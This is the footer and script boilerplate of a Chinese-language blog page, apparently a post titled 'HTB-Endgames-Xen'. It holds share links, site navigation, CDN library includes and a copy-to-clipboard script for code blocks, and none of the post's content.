  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/01/28/HTB-Endgames-Xen/&name=HTB-Endgames-Xen&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/01/28/HTB-Endgames-Xen/&t=HTB-Endgames-Xen"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2025
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/projects_url">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
